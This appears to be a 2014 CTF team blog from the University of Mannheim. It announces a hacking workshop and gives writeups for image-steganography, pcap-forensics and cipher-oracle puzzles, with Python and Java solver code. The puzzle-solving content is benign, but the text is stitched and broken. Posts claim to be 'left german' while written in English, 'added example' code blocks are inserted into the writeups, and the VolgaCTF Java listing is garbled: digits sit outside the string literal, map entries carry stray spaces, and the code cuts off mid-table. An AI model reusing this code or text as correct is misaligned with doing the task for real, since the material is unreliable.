CTF-Workshop Oktober 2014

September 5, 2014

This page is intentionally left german.

After the last workshops, which went well and earned us a lot of positive feedback, we again want to hold a compact workshop on hacking and CTF competitions in the coming winter semester. The workshop takes place on the weekend of 10 to 12 October.

We are the squareroots, the hacking team of the University of Mannheim, founded in 2006, which regularly takes part in worldwide IT security competitions (so-called Capture the Flag competitions). Our members are mainly students from various institutions (including the university, DHBW and HS MA) and fields of study, but other interested people are welcome too.

During the event, participants get an introduction to various kinds of vulnerabilities that show up both in simulated hacking competitions and in real web services. In addition we present a structured approach to taking part in CTF competitions. Participants also learn the basics of using the Linux console and of automating tasks in Python. The workshop is rounded off on Sunday afternoon with a real CTF competition in which the participants compete against each other in teams.

As currently planned, on Friday we give an introduction to Linux and the console. Afterwards there is a get-together with the participants, where we would like to get to know you a bit. Saturday is devoted to the "hard facts": we start with JavaScript, command and SQL injections, and the basics of regular expressions. Sunday is all about the CTF competition: we explain how to automate recurring tasks in a CTF and what the first hour of a CTF looks like. In the afternoon we run a CTF in which the participants compete against each other in teams.

In principle there are no restrictions on operating systems. For the Linux part of the course we will provide you with resources. It certainly does not hurt, though, to bring a Linux live CD or live USB stick for the final CTF, since some things are not quite so easy to do under Windows. Mac users should not need this.

Keep Friday from 7 pm and Saturday/Sunday (11/12 October) from about 10 am to 7 pm free. The schedule will follow shortly.

The course is explicitly not aimed only at students of the University of Mannheim, but also at students of the other Mannheim universities and at everyone in the Rhine-Neckar region who is interested in IT security. If you have questions, please send an e-mail to Johannes (sqrts@anmeldung.sqrts.de).

Registration is open now at http://anmeldung.sqrts.de/!

This event is held in cooperation with the Theoretical Computer Science and IT Security group of the University of Mannheim.


HITCON CTF 2014: Puzzle

August 18, 2014

This is the picture we got:

[image: SONY DSC]

After downloading, I opened the picture with an image viewer and saved it again, only to compare the file sizes. As expected, the original is much larger than the re-saved one. Then I opened it in stegsolve to make sure I didn't miss anything. Looking at the image in a hex editor I noticed a lot of JFXX strings, so I let the program search for the JPEG header FF D8, which gave 102 results. In order to extract those images I wrote a small program:

f = open('puzzle.jpg', 'rb')
d = f.read()
f.close()

j = 0
# stop one byte early: the marker check looks at d[i] and d[i+1]
for i in range(len(d) - 1):
    # JPEG SOI marker FF D8: dump everything from here to the end of the file
    # (decoders stop at the next EOI marker, so the trailing data is harmless)
    if d[i:i+2] == b'\xff\xd8':
        f = open(str(j) + '.jpg', 'wb')
        f.write(d[i:])
        f.close()
        j += 1

So that’s the puzzle (combined picture):

[image: out2]

But I didn't want to solve the puzzle in Paint by hand, so I let Python do the work for me and search for the matching neighbour of a given image on a given side.

from PIL import Image
import operator
import sys

values = {}
ima = Image.open(sys.argv[1] + '.jpg')
da = ima.load()
sa = ima.size
side = sys.argv[2]   # l, t, r or b: which edge of image A we want a neighbour for
for i in range(2, 101):
    imb = Image.open(str(i) + '.jpg')
    sb = imb.size
    db = imb.load()
    z = 0
    # walk along the shared edge: the height for left/right, the width for top/bottom
    length = sa[1] if side in ("l", "r") else sa[0]
    for x in range(length):
        if side == "l":            # A's left column vs. B's right column
            a = da[0, x]
            b = db[sb[0]-1, x]
        elif side == "t":          # A's top row vs. B's bottom row
            a = da[x, 0]
            b = db[x, sb[1]-1]
        elif side == "r":          # A's right column vs. B's left column
            a = da[sa[0]-1, x]
            b = db[0, x]
        else:                      # bottom: A's bottom row vs. B's top row
            a = da[x, sa[1]-1]
            b = db[x, 0]

        # sum of absolute differences over the R, G and B channels
        y = abs(a[0]-b[0]) + abs(a[1]-b[1]) + abs(a[2]-b[2])
        z += y
    values[str(i) + '.jpg'] = z
sorted_values = sorted(values.items(), key=operator.itemgetter(1))
print(sorted_values[0])   # the candidate whose edge differs least from A's

A team member mentioned that the key is probably in the sky, as something can be seen there in the puzzle pictures.
After some time putting the images together I got this:

[image: puzzlediff]

Here we can read “HITCON” and “ounT”. Another team member found the original image, so we could use the image combiner in stegsolve, which finally gave us this:

[image: solved]

Flag: HITCON{mounTAIn_jEPg_I01}


squareroots @ GPN14

June 19, 2014

This post intentionally left german.

It is warm outside, the fans are spinning loudly and … in Karlsruhe goulash is being cooked. It is time again for the Gulaschprogrammiernacht of Entropia e.V.
This year we are running a CTF as part of it, with cool prizes that will make the heart of every Haeckse and every hacker beat faster.

We start on Friday, 20 June 2014, at 16:00 in the blauer Salon with some basic information, and then it begins straight away. The CTF runs until about 23:00 on Saturday (21 June 2014).

We will let the servers boot and look forward to seeing you :)


ASIS CTF 2014: Blocks (Stego 100)

May 16, 2014

This challenge comes with a 361×361 px image, that is 19×19 squares of 19×19 px each.

Every square is either black or white. After analyzing the alpha planes, a hidden pattern can be found in alpha plane 0.
This second pattern consists of 19×19 squares of 1×1 px.

For the next step we scaled the first image down to match the 19×19 px size of the second pattern.
Then we converted each image to a binary file row-wise, setting a bit to 0 if a pixel is black and to 1 if it is white, starting in the upper left corner.

Finally we used this Python script to XOR the nth byte of each file and combine the results into a string.
This gave us the flag ASIS_08213db585ffe1c93c8f04622c319594

a = open('inner.bin', 'rb')
x = a.read()
a.close()

b = open('outer.bin', 'rb')
y = b.read()
b.close()

# XOR the n-th byte of each file; iterating over bytes yields ints in Python 3
print(''.join(chr(p ^ q) for p, q in zip(x, y)))

Output:

flag = ASIS_08213db585ffe1c93c8f04622c319594
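The writeup's snippet starts from two already-packed .bin files. The following is an added example (not the team's script) that also shows the step before it: packing two 19×19 black/white grids row-wise into bytes and XORing them. The grids and the embedded message are constructed for this example; note that 361 bits fill only 45 bytes, so the last bit is dropped.

```python
# Added example: pack two 19x19 black/white grids row-wise (bit 1 = white,
# bit 0 = black, starting top-left) and XOR the n-th bytes, as in the writeup.
# The grids below are constructed: the outer one is the inner one XORed with
# the bits of a sample message.

GRID = 19                      # 19x19 squares -> 361 bits -> 45 bytes + 1 spare bit

def pack_rows(grid):
    """grid: list of 19 strings made of 'B'/'W'. Returns the packed bytes, MSB first.
    The 361st bit cannot complete a byte and is dropped, so 45 bytes remain."""
    bits = [1 if px == 'W' else 0 for row in grid for px in row]
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)

def xor_bytes(x, y):
    return bytes(p ^ q for p, q in zip(x, y))

def recover_text(inner_grid, outer_grid):
    """Combine the two patterns the way the writeup does and decode as ASCII."""
    return xor_bytes(pack_rows(inner_grid), pack_rows(outer_grid)).decode('ascii')

# ---- constructed sample data ---------------------------------------------
def grid_from_bits(bits):
    """Lay 361 bits out row-wise as a 19x19 grid of 'B'/'W' characters."""
    return [''.join('W' if b else 'B' for b in bits[r * GRID:(r + 1) * GRID])
            for r in range(GRID)]

def bits_of(data):
    """MSB-first bit list of a byte string."""
    return [(byte >> (7 - k)) & 1 for byte in data for k in range(8)]

# a deterministic pseudo-random mask stands in for the visible black/white squares
MASK = bytes(((37 * i + 11) * 97) & 0xff for i in range(45)) + b'\x00'
MESSAGE = b'ASIS_' + b'0123456789abcdef' * 2 + b'01234567'   # 45 bytes, constructed
assert len(MESSAGE) == 45

INNER = grid_from_bits(bits_of(MASK)[:361])
OUTER = grid_from_bits(bits_of(xor_bytes(MASK, MESSAGE + b'\x00'))[:361])

if __name__ == '__main__':
    print(recover_text(INNER, OUTER))
```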

ASIS CTF 2014: forensic

May 13, 2014

After extracting the challenge archive we get a fairly big pcap file. As usual, the problem is to find anything helpful at all.

A valid option in challenges like this is to look at all the files that were downloaded. You can do that in Wireshark via “Export Objects”, which is quite tiresome in this particular challenge because of the large number of files requested throughout the session.
The other option is to look at the “Conversations” in the capture and sort by packet length, which I finally did after a long time of scrolling through hundreds of useless packets…

[image: 001]

So the largest file in this capture was a file named “myfile”, downloaded from a rather unusual port of a server that is no longer reachable (and is in the same subnet as the client. Interesting!).
It seems we are lucky: the file at least looks interesting, as it is another pcap file. Unfortunately Wireshark can't open it without some fixing beforehand.
I'm sure there are many ways to actually look at the capture file, but I just downloaded a program called “pcapfix”, which worked quite well. After fixing the file, Wireshark was able to open it.

My joy at finding this file faded when I saw roughly another 20000 captured packets. However, remembering how I found that file, I opted to do the same thing again: look at the conversations and sort by packet length.

[image: 002]

Now that's very interesting: a telnet conversation and some huge files. Even though the telnet conversation seems interesting at first, it is not really useful…
However, there are still the other three files, and indeed, after some time spent looking up which port/protocol was used to transfer them and what kind of files we were dealing with, we find out that the three big files are PostScript files.

When opening those files, one of them tells us the flag in ASCII art:

[image: 003]

Thanks to Michael for writing this writeup :)


ASIS CTF 2014: Random Image

May 11, 2014

This crypto challenge was worth 150 points. A very nice task – kudos to the guys from ASIS for organizing the CTF. About the task: when downloading and unzipping the file you'll get two things:

  • A picture enc.png
  • A python script color-crypto.py

The image only contains random noise, or at least does not resemble anything.
The Python script reveals the task:

#!/usr/bin/env python

import Image
import random

def get_color(x, y, r):
    n = (pow(x, 3) + pow(y, 3)) ^ r
    return (n ^ ((n >> 8) << 8 ))
flag_img = Image.open("flag.png")
im = flag_img.load()
r = random.randint(1, pow(2, 256))
print flag_img.size

enc_img = Image.new(flag_img.mode, flag_img.size)
enpix = enc_img.load()

for x in range(flag_img.size[0]):
    for y in range(flag_img.size[1]):
        t = random.randint(1, pow(2, 256)) % 250
        enpix[x,y] = t

for x in range(flag_img.size[0]):
    for y in range(flag_img.size[1]):
        if im[x,y] < 250 :
            s = get_color(x, y, r)
            enpix[x,y] = s

enc_img.save('enc' + '.png')

So it seems that our goal is to restore the original flag.png file.
First we take a look at the two loops: the first one fills a new image
(with the same dimensions as flag.png) with random monochrome values.
The second loop iterates over every pixel of flag.png. Should the
colour value of a pixel be smaller than 250 (i.e. it is not white),
the result of the get_color method is written at the position of the current
pixel.

We therefore have to analyze the get_color method. It takes
three arguments: the x and y position of a pixel and a random number r.
r is set at the beginning of the script and contains a random
256-bit integer. The method calculates the sum of
the cubes of x and y, XORs it with r, and returns the 8 lowest
bits of this number.

In order to get the original image we have to do the following:

  1. get to know the value of r used to generate the enc.png
  2. find out which pixels were part of the original image

So in order to find out the value of r used in the original generation of
the image, we XORed every colour value of each pixel with the lowest 8
bits of the sum of cubes of the pixel coordinates. This results in:

(x^3 + y^3) XOR (x^3 + y^3) XOR r

We thus end up with only the value of r (more precisely its lowest 8 bits, which is all get_color leaks). As we do not know
which pixels were calculated that way, we stored the results in a dict with the result as the key and its count as the value.
The value with the most occurrences was then chosen. With ~28000
occurrences compared to ~300 for the other values we determined r to
be 61.

The second part was straightforward: just apply the above calculation
to each pixel again and check whether it results in 61. Should this be the
case, draw a black pixel at the current position. This resulted in the flag:

[image: flag]

Here is our code:

#!/usr/bin/env python

from PIL import Image
import sys
from collections import defaultdict
import operator

flag_img = Image.open(sys.argv[1])    # enc.png
im = flag_img.load()

rd = defaultdict(int)                 # candidate value of r -> number of pixels voting for it
nope = flag_img.size[0] * flag_img.size[1]   # total number of pixels

new_flag = Image.new("RGBA", flag_img.size)
new_flag_im = new_flag.load()

for x in range(flag_img.size[0]):
    for y in range(flag_img.size[1]):
        pix = im[x, y] % 256
        n = pow(x, 3) + pow(y, 3)
        r = pix ^ (n % 256)           # undoes get_color: leaves the low 8 bits of r
        if r == 61:
            new_flag_im[x, y] = (0, 0, 0, 255)   # part of the drawing: black
        else:
            new_flag_im[x, y] = (0, 0, 0, 0)     # noise: transparent
        rd[r] += 1

sortrd = sorted(rd.items(), key=operator.itemgetter(1))
for k, v in sortrd:
    print("%03d %.3f %d" % (k, float(v) / float(nope) * 100.0, v))

new_flag.save("new_flag.png")
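To see why the majority vote works, and what it does not fix, here is an added example (not the team's script) that simulates color-crypto.py on a small constructed drawing and then runs the recovery from the writeup. The canvas, the shape and the value of r are constructed; no PIL is needed.

```python
# Added example: the challenge's get_color() on a constructed "flag", then
# recovery of the low 8 bits of r by majority vote, as the writeup does.
import random
from collections import Counter

def get_color(x, y, r):
    """The challenge's pixel function: low 8 bits of (x^3 + y^3) XOR r."""
    n = (pow(x, 3) + pow(y, 3)) ^ r
    return n ^ ((n >> 8) << 8)

def encrypt(flag, r, rng):
    """flag: 2-D list [x][y] of grey values; pixels < 250 count as ink.
    Mirrors the two loops of color-crypto.py and returns the enc image."""
    w, h = len(flag), len(flag[0])
    enc = [[rng.randint(1, pow(2, 256)) % 250 for _ in range(h)] for _ in range(w)]
    for x in range(w):
        for y in range(h):
            if flag[x][y] < 250:
                enc[x][y] = get_color(x, y, r)
    return enc

def recover_r_low8(enc):
    """XOR every pixel with low8(x^3 + y^3): ink pixels all yield low8(r),
    noise pixels yield scattered values. Returns (winner, its vote count)."""
    votes = Counter()
    for x, col in enumerate(enc):
        for y, pix in enumerate(col):
            votes[pix ^ ((pow(x, 3) + pow(y, 3)) & 0xff)] += 1
    return votes.most_common(1)[0]

def recover_flag(enc, r_low8):
    """True where the pixel reproduces r_low8, i.e. where the drawing was.
    Noise pixels hit the value by chance with probability about 1/250, so a
    few stray dots remain; that is the residue the writeup's ~300 refers to."""
    return [[(pix ^ ((pow(x, 3) + pow(y, 3)) & 0xff)) == r_low8
             for y, pix in enumerate(col)] for x, col in enumerate(enc)]

# ---- constructed sample: 40x40 white canvas with a black L shape ----------
W = H = 40
FLAG = [[255] * H for _ in range(W)]
for x in range(5, 35):
    FLAG[x][30] = 0            # horizontal bar
for y in range(5, 31):
    FLAG[5][y] = 0             # vertical bar (55 ink pixels in total)
R = 0x1234567890abcdef3d       # constructed r; its low byte is 0x3d == 61 as on the page

ENC = encrypt(FLAG, R, random.Random(2014))   # fixed seed: deterministic noise

def demo():
    """Returns (recovered low byte, its vote count, missed ink pixels, false positives)."""
    r_low8, count = recover_r_low8(ENC)
    recovered = recover_flag(ENC, r_low8)
    ink = [[FLAG[x][y] < 250 for y in range(H)] for x in range(W)]
    missed = sum(1 for x in range(W) for y in range(H) if ink[x][y] and not recovered[x][y])
    false_pos = sum(1 for x in range(W) for y in range(H) if recovered[x][y] and not ink[x][y])
    return r_low8, count, missed, false_pos

if __name__ == '__main__':
    print(demo())
```

Every ink pixel is recovered; the handful of false positives in the noise is why the real solution still needed a human to read the result.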

ASIS CTF 2014: Tortureous sound

May 11, 2014

After downloading and extracting we got a file which was identified as:

$~/asis2014$ file steg_75_235fdd4c364c6d58d79bb6e6fad45ef7
steg_75_235fdd4c364c6d58d79bb6e6fad45ef7: ISO Media, MPEG v4 system, version 2

Ok, this looks like an audio or video file. Let's try to open it with a media player.
Great, we can open it, and hear that typical SSTV sound. Ok, let's open RX-SSTV and replay the audio file.

Because we did this part so far on a MacBook Pro and RX-SSTV does not run properly within a Windows VM, we used another computer running Windows with RX-SSTV and connected the two via audio cable.

The first picture we got was this:

[image: 2014-05-08_22.36.45]

Ok, this looked kind of strange, but in the center it looks like a QR code. Maybe we can tweak it a little bit in Audacity. When we opened it in Audacity, we noticed there are five audio tracks, which were played together.

[image: asis2014_audacity]

So let's play each audio track separately and record it with RX-SSTV. We got these five pictures:

[image: 2014-05-08_22.41.08]

[image: 2014-05-08_22.40.20]

[image: 2014-05-08_22.43.19]

[image: SSTV-08May2014-224726]

[image: 2014-05-08_22.44.28]

Apart from the troll face we can now clearly see four parts of the QR code, in the center of each picture. After we cut out the parts and merged them in the order we thought they needed to be in, we tried to scan the QR code. But unfortunately it didn't work. :(

Ok, let's study the QR code article on Wikipedia. The timing pattern is there and valid. The version and format information is there, too. We wondered a bit about the low error correction level, but ok. After studying the QR code for almost 2 hours, we agreed that we needed to get it done without writing a QR code parser ourselves. Since the timing pattern was correct, we would only mirror the three position images along the top-left to bottom-right diagonal and then add the alignment part in the bottom right. Maybe we needed to flip the alignment image.

When I tried to scan it with my mobile it took some seconds, and I thought ok, let's take a look at another task, but suddenly an MD5 sum appeared.

[image: Screenshot_2014-05-10-19-21-47]

So the flag is: ASIS_83c37934407754f81e9e2f98ff3d231f
And this is the QR code:

[image: QR]

That was a great challenge, unfortunately only worth 75 points.


VolgaCTF 2014 Writeup: crypto100

April 2, 2014

In this task, we have got a ciphertext and an oracle that we can use to encrypt data.

Looking at the ciphertext we can see that it is a very big number.

Time to test the oracle: connect to the server and we're greeted with “enter your text”. After entering some text, the ciphertext is displayed and the connection is closed.

First thing to check: is the server deterministic? (If not, it would have been much harder ;) After entering the same text several times and checking that the result is always the same, it is safe to presume that the same input will always produce the same ciphertext.

Let's do some simple tests:

a -> 4
A -> 4
aa -> 32
aaa -> 4096
aaaa -> 33554432

From here we can recognize a pattern: they are powers of 2:

a -> 4 = 2 ^ 2
A -> 4 = 2 ^ 2
aa -> 32 = 2 ^ 5
aaa -> 4096 = 2 ^ 12
aaaa -> 33554432 = 2 ^ 25

If we try b:

b -> 9
bb -> 243
bbb -> 531441

Same story, this time they are powers of 3:

b -> 9 = 3 ^ 2
bb -> 243 = 3 ^ 5
bbb -> 531441 = 3 ^ 12

The exponents are the same (2, 5, 12).
Now let's try to combine them:

ab -> 108 = 2 ^ 2 * 3 ^ 3

It looks like, as the text is parsed, each character is assigned a value and an exponent depending on its position, and they are finally multiplied together to get the ciphertext.
Back to the simple tests in order to check the exponents:

aa -> 32 = 2 ^ 5 = 2 ^ 2 * 2 ^ 3
bb -> 243 = 3 ^ 5 = 3 ^ 2 * 3 ^ 3

It looks like the character in the first position gets the exponent 2, the second 3.

Now let's get all the values assigned to the letters (uppercase/lowercase get the same number, as found out earlier):

a 4
b 9
c 49
d 169
e 841
f 3481
g 16129
h 58081
i 237169
j 942841
k 3798601
l 15124321
m 60668521
n 242393761
o 969637321
p 3880916209
q 15519428929
r 62091170761
s 248333785561
t 993388962721
u 3973472129449
v 15893864597521
w 63575410549561
x 254301737879281
y 1017208928926369
z 4068831250586881

We can see here (at least for the first few results) that they are squares of prime numbers. So now let's factorize the ciphertext to find the characters used. I tried using CrypTool/Wolfram Alpha but the ciphertext was too long, so let's use Java!
The program is pretty simple: we already have the factors, we just have to check whether they divide the ciphertext and find out the exponent to get the positions.

To do that I first wrote a Python script to get the factors and emit Java code that adds them to a HashMap:

import socket
import math
import string

host = "tasks.2014.volgactf.ru"
port = 28121

for c in string.ascii_letters:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))

    s.recv(512)                   # "Enter your text"
    s.sendall(c.encode())
    # a single character comes back as p^2; isqrt is exact for big integers
    p = math.isqrt(int(s.recv(512)))
    # we want to print f.put(new BigInteger("2"), "a");
    print('f.put(new BigInteger("%d"), "%s");' % (p, c))
    s.close()

and then we copy the results into our Java code:

import java.math.BigInteger;
import java.util.HashMap;
import java.util.Map;

public class factor {

    public static void main(String[] args) {

        BigInteger a = new BigInteger("<ciphertext omitted: several thousand decimal digits>");
 16172710833991472421411194172246616139726245057469472453935814
 13437639618363572298396232619974638177415018933434001477108239
 89413733429768675552594726668479961828726434444206384667962069
 59649471204031240349124173644750574982337468815085912300485417
 81036636103942400333047729526420116153598595035512660335384236
 55215182960371058895463701616777554130790996373573325846828559
 09250524801902614804481678074419588264975010802605233484194650
 02773249227169286751644328554521862334020697588449708908864337
 52578543704322856271894630500988293664441087781140453524301178
 79169833182647795389445753305609571733882783984627696296833140
 08002056295325514027489807717552233237160246526976618182327338
 84854098750085568073773950591094637270631802284207542059228574
 54759323470477977138473103231183818889465199479190217486743642
 06135139028327447412192156016518297255320881967799153384536094
 52852761969673708777767767479590594598322997997574975507035504
 67089773448933726590606788309282102968546180824168161705336317
 75180970357438689931567452610847415810162626742289995530469566
 05697492923504972673439016535567778872182764272570696331791440
 24211456449051729795985791117391124498849467877635620659855471
 29648351488629531606522390373818769591317304423929967568365388
 71343969290912947534941567832088746295021879673977975665458184
 42493222326110904096494778737492648991458855268045467370977187
 70644858866654958378399482041044042975694254147901112651369014
 71800337462484725614633663047737406735738009100376183083344736
 24716084373230670883310201638998955381783736839323427308592090
 79329418292612895043433161003280328083144487604845772220337221
 60347423878183937802954813959743097498556037882259593214082865
 70051584444076322432140343607551923910312344694747789985684798
 26085870713289181335548766144731670859168899790869996834615023
 04143551040091285213651363526748228780003323023038751501681797
 22945633169095626009452032840167267946913626722710513908894036
 24802701185403771263685080473189220718316966772994788571889318
 94370074574973047315063182732047852031326708960333107140943608
 21626008868139165263934553520716382826554344636312522254218320
 84820495640865487753945579964299687300515669563603175461250874
 78306252382505834084327077140585341014461307454782937016513953
 58625983024475013561756096972986698594430987420966243680016385
 35887404320115751433630672474775193767316616493455744094103805
 86886997416599817821139318954768218388174915078299202201359614
 07845496545287547578741957779590905662059061574198058551992552
 58428905247886850265254681110943033184258883795140733630089483
 04723131215593352165648200902911452871512929587820602191030776
 29043698505664442017880916769737723384755561344446663104134298
 85280404052326827074467638408111002000856722905233809996308855
 56004571573605178186344634143973346404351336273264315903113861
 64374309917497773913657746940543461924829222385468846157689347
 38393940857800977573057036431616695306530668114735972923359546
 00652500550876730767078970777600645765984036516710718620963903
 54031790818395171516371706875537403661909691333243560712065193
 87979777566174648472261439315795530750901304606354660605631184
 84032146137189972044139778142885233628680415575269807674056055
 36104355491670756562528352948407678653340301973772351447906192
 98363331326417592703111854471596112923066057081148387988024947
 19491997820683575850219395652005241246857610036153930223614072
 11081705510811900688126371440156785399419088832158623478682861
 36473448427295865786755915855774059392524092663081844542060738
 25512910342084233317422043857387580338792190938923868285414668
 96611571637522306121883609693209555783941136483662917937601569
 41383478399731788089890185444918605174129762419745171811821499
 71031388188330960115973199208942677296090981328822337375199562
 83711933519619611692124465802516242301461555387163047376709301
 60341890198160638914636062287441842616782974018547690311415108
 36539365405718004781497869939388601612732295993718228332079834
 34850790259063778271162128204960633897554991259156810084159855
 28242206560042141061928233292484022646419317439135461235600538
 79034800787323705365531814431303634306974825837183475788796236
 54316533547960777238977633407484563346760058541432214916568645
 23742577486995897661477572713366352066296586224195267531169299
 27229075029339754654620667320543655744140199980582875067699116
 80390856873903760846710445180138744383599841706320397312965549
 17565291298278164261242483817029692893788167736816915617846403
 17466580786212351899852444932936135787262771891058696196407405
 04235064805387012008016330220537784672443567077943238934261562
 66553948283309604944884696554260352506301250259723629214624837
 59913240653118410121690802125553756278418124154236976068094299
 94209681338974317968151532295899192329620747829367420640714203
 64846360359313325249443359696252954456192411081238501737141470
 91280117842195952850249565329749086092028027870941105113032159
 84876903874102335939990299042490489327496308837555966435396788
 44862539440899824953544299808868612457775933472138196224610453
 11530583422527070497633775318179809828500606697569377465799799
 54471406484189708077975403022158460758575900267409730712997929
 47231019376815728466310052966308682895184358544097519342740100
 57110112921490461877951204535537569391909273437314677447327866
 52201447146133572786175423917384273338870515010134540307199064
 72130560184292107366400427201842266741742616726659163475848294
 29106509174585334314039204410435021019531690830894740406966589
 64446806141569970688313113713675854861252572450983082228174556
 69226435385032269967652101467283370112904695529770227827569492
 33024024077309218063651088059764601517090086367283292989275102
 12493678669330884604031229350765021136211996328384942775694289
 22846635710532840466490571868584890022175104900152707209095045
 34718967927081692301151787124429068338106088810324757072683083
 35917432118141540657580628492535966518129582795502526236826218
 72636229125218116174003193364505606435854332737466252942091254
 32024201322723281187376104926062606799629068739639999598033235
 69265154282915206295382484585072950005493453636988290143769751
 55567039758627718923752144724061268577228842873002480301205693
 38711682393363911077831374245727477116622310174489168697283823
 27909944203175197657028404534911769099866852844794777786503985
 73796522979517352844682755099840225582812967180323674510772497
 39959737862418053213242683662600030016014696788538709020853185
 43115850894875821249106576711256811644556760629140853689288951
 21678087675344314006230531023072480157470134102402038891626111
 99059386317964719719430596483266433739774806584001249029864970
 77850563444136255262721992437120425927933609150628040374630569
 40092977679992449303976426852566163575262373841796566356073988
 88163263542920360147457511602729447257174644336814131943335128
 34561693324629530634730312186987935370530286632627750769461711
 14115969666176076032180757871072768553041435994226444214246975
 37043385747508966834236761124451511929284080094580986762994035
 27564636085397648925518549585885348988931501715248563068096900
 70189393644571374555366996381528901138540867350905163837456503
 65996709940084553531543728970279642261703834303025755114291439
 41088976046130621734044518761352562303672111346564531852804468
 65731868864416007534066552997480510402908524593887856902631336
 10700499903575211931579729772601380004944131156075381050290959
 51962559353898651470522486361543945405596432840740942593481764
 11101470929604675803135836523242158769878315933653829981800890
 63149180359780299109632005975607087374655278220823470457068083
 03778761408448803538143970931834683393867466135992802049435054
 24521179697106162112073151704069482267215106754059695736784871
 98759762772429761365086202092257924498485785670048217238102203
 43521615746529733701191110045173140646184589892589851532859044
 63454016704566191713113410448111674445957043213244292933040073
 73352388523065506964470775567357902794060723997781235661282820
 15132637075521158967198168773251488380162080715125262642018623
 21502987667554698788631483417433992007047091285071034182872233
 07403454997176066022014156183455637695078970971099199071751418
 00255054276500946778638100304720183447775877471755171812481380
 59677133337326604540992222461259014828648752413330449609350106
 01198311943794604555937612785604132687582104298367783177330669
 81440814715617755380107621863593677229811877190979533649979538
 17565814652133206971957145104230807190637213544770944356998510
 64640130739959546946185142406806904821515707159367004173408608
 59833504250181347199434224557171466566443457175989423505312498
 24396390974689420782783445334849757048789810439651838468556668
 17971325941707786303007910180554945017607889503296339162498506
 16139331054727761885847030868137379220914225158030232965122083
 40256704000188321265281828557448765848837632675209827568269451
 88756911432877186024613986724724263309243765478717498181675792
 05389682428143493080662695837909019092902628621269237105031754
 38609633789556447121705477917482339471706209257654609177238153
 28561499584062999518970999204358574593278983749769705279990843
 38915939359460103277345023258957064367368841958337348249848641
 02087587230185526840178298817653370531034053455957470606087465
 92047799033545535323323416285625642700730808268433166815168232
 78426731506030343515592777926053981892594894802165187253762883
 34868268348570017754105979511855089605501008638163758742842912
 48738921833661187136231835025113086349653981912663616038580622
 78615091399606418777669943990895203173667273070471680669721447
 67361249763241371479782769018332203208637205331604578962561327
 62395086892864019757980160030219013071565324847340863727100742
 90597806782507276969657464144407942727660195994192833864939698
 37750585801041413334922419378293939288142128617565224786556809
 94028540328636383291390986473960160453241102609659027111767363
 04962393313342346878209160265866969568264521177586407295779829
 42673897219879354202578191811711416373099504888041307802839326
 88709774799771471191989052945844827855291336019143486167915296
 78064625387471028762142031487405659095441760263553293687046561
 40485967875100070448057501743464257682809593131716592468316347
 71484044861414326371996645730705757197037506888639275083892235
 85520630883294317486757026963289630103118738425289976300685721
 48864052532955749639857850402390454276254010894993818634719054
 88679698133106256645216309743253158144756853070178868648341170
 11236758894049552412698397893222034548911470223747913485314815
 33846589798803149523298502206277044838284947388921860364335609
 72559786177126070872700400776103169075283511078045809054886604
 34130464473176505935004488899580120173676626706902885861939676
 01096142063621588694572119287468055538540020153480154082267598
 01554360132814697619487458634824765431328126755920330108676508
 45064517020413665101428136151268001931231081632555609781439886
 34151295019529646576068898435928694157329023493602556554606569
 54768991087162625695917087583295743908003608879382759551613832
 52955768348467185613436256942272261897441414108928973613634924
 98601435154724319311322398230175303139799510637522184849616201
 82500562235443529927504186742977061089269588885630204541640237
 13947843035199231029896440525636685983520089791342737640805586
 82620342094716132266784643783090442776332335232204670330969367
 71786692718068651613151778559440765162572899666509915441275435
 17380075468616451790023249167153411548381829093928652419620481
 34803676131455913336054839873070282594637644965905893293578984
 70052054178727546154159828474770327394401935525910019340495286
 98134628927924829825481647208778492862470164656506532800683232
 93971597829308769649523791284101119320033295655826038829116884
 56093740465180242364409036410102786869758101055881811989874033
 36717015537953101223054169140402668460054808409956970960302098
 33732373924344007102454946858503389325685887520454564488363424
 15137838740459290220390786551930191873720409673853625406891479
 65492715178122052514861492747396923891489329261196118900142022
 12082357423814719618543767635794433685623288104499782212028155
 72860659715236151717250979625371128159463913028000997253291674
 72372508369958839592859493317328517203426376226638361707098475
 93042671045184457513211466840778238822345568419215424188609496
 07329098304020732239102486169671121747247644724626256816889362
 82120075432265391924942624467172775218156228724917473005448552
 54942626850563853226285476091609430364194681390386687663924533
 82148661604204550960267477585365154431248139681198008023392186
 95781361791948498452747127902802380675676654928692618234260053
 11203009106410649061150305960566125985049679978119414987004500
 31039384558786259715767675256958860052435642885845786998367847
 30973638349826858969241321032537215516619791899866430301364689
 55876685973094710331666364438111002703959407331670784751883336
 99331574882872567826170713353358681631352934588923006641370680
 33907868157929796923713520243919115168532310540942527040672753
 16672177213337581686238164327259645002843809869188943553789522
 19564657441771589676592938243415288179821913135870120803537626
 09446265701835500625870858753882792958540505735422484053255441
 89186748470392392739788813463498554340216203509066251532422768
 69232985601360170446078307649336171355220352784129276359259785
 41631800883153344035638646397759181407339860016617419389340907
 00801401958662073898699369415568220585432131155953695318618899
 28411565059802748679637377474692600802359824949798086704767561
 01147687051031021484736937343575224770853493476090045636150249
 70014890887940655830976007119564373320968348183806894429661862
 69423854614258323783972411071242892149468095810470088075818178
 88670029688408012435551075866150304026102100313615782001575776
 12719715340710561572397671706034026801945462349871571855196008
 26151068844115075257345561470981741510741066696878002829505876
 28232515311825948616114493379871346981834192714448272660487864
 49537508605970173453436023679332662915793526971382510004685510
 37158361524246932161327340470665922268558194463606897361762364
 13979581030416005748358577153483215532580196846453448382526856
 54098719318628780749358138079159486518953386352662457870835745
 92563832494362662351885605188211934789455597316492270886257596
 00946801980349915477785568603733918737572693659121065920849504
 39764396282963469198175375586755798472315425371391554108834243
 32207052774255288482577966326689797460113866620417471902086961
 95007741294595865360437951910254909481033");

HashMap<BigInteger, String> f = new HashMap<BigInteger,String>();
 f.put(new BigInteger("2")," a");
 f.put(new BigInteger("3")," b");
 f.put(new BigInteger("7")," c");
 f.put(new BigInteger("13")," d");
 f.put(new BigInteger("29")," e");
 f.put(new BigInteger("59")," f");
 f.put(new BigInteger("127")," g");
 f.put(new BigInteger("241")," h");
 f.put(new BigInteger("487")," i");
 f.put(new BigInteger("971")," j");
 f.put(new BigInteger("1949")," k");
 f.put(new BigInteger("3889")," l");
 f.put(new BigInteger("7789")," m");
 f.put(new BigInteger("15569")," n");
 f.put(new BigInteger("31139")," o");
 f.put(new BigInteger("62297")," p");
 f.put(new BigInteger("124577")," q");
